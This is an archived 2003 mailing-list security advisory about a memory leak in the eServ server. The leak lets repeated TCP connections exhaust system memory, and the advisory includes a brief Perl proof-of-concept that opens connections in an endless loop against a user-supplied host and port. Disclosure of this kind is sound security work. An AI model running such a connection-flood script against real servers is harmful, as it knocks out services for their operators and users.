lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <003d01c317d9$6bb1eab0$0c351c41@basement>
Date: Sun, 11 May 2003 11:21:43 -0500
From: "Matthew Murphy" <mattmurphy@...rr.com>
To: "BugTraq" <bugtraq@...urityfocus.com>,
   "Full Disclosure" <full-disclosure@...ts.netsys.com>,
   "SecurITeam News" <news@...uriteam.com>,
   "VulnWatch" <vulnwatch@...nwatch.org>
Subject: eServ Memory Leak Enables Denial of Service Attacks


eServ Memory Leak Enables Denial of Service Attacks

I. Product Description

eServ is a hybrid Web server (HTTP), FTP server, mail server (POP3, SMTP,
Finger), news server (NNTP), and proxy server.  It provides all these
services in a single package, so that administrators are not required to run
multiple different packages to support these protocols.

II. Vulnerability Description

eServ's connection handling routine contains a memory leak that may be
exploited to cause the eServ daemon to become unavailable.  Upon receiving a
connection, the server allocates a block of memory on the heap between 8 and
32 kilobytes in size.  The reason for this size variance was not isolated.
This block of memory is not freed on disconnect, leading it to leak.  After
several thousand successful connections, memory use on the system becomes
exceedingly high.  If memory use on the system becomes excessively high, the
system may become unusable.

III. Impact

An attacker who can repeatedly establish connections with the eServ daemon
can cause services running on the vulnerable system (including other
services outside of eServ's process) to fail.  The vulnerability can
actually be exploited by accident on high-traffic sites -- each connection
causes a leak.  After about 1,000 connections, anywhere between 7.81 MB and
31.25 MB may leak.

To deprive an average server system of resources to the point of failure, a
significant number of connections is required.  After 10,000 connections,
78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections is
sufficient to cause system failure.  At this point, 390.5 MB to 1.52 GB has
leaked.

IV. Vendor Contact

I attempted to contact the vendor via info@...rv.ru and support@...rv.ru.
The former address bounced, and no response was received from the second
contact attempt.  eServ has a horrible security record, and I recommend
using a production server for internet sites.

V. Exploit

#!/usr/bin/perl
#LEGAL NOTICE: Don't test this on networks you don't administer,
#and do not test this tool on networks you don't own without
#permission of the network owner.  You are responsible for all
#damage due to your use of this tool.
use IO::Socket;
print "$0: eServ Remote DoS Exploit\r\n";
print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n";
print "Server hostname\: ";
$host = trim(chomp($line = <STDIN>));
print "Service port to probe\: ";
$port = trim(chomp($line = <STDIN>));
print "\r\nBeginning probe -- stop with CTRL+C\r\n";
while (1) {
 $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
 undef $f;
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ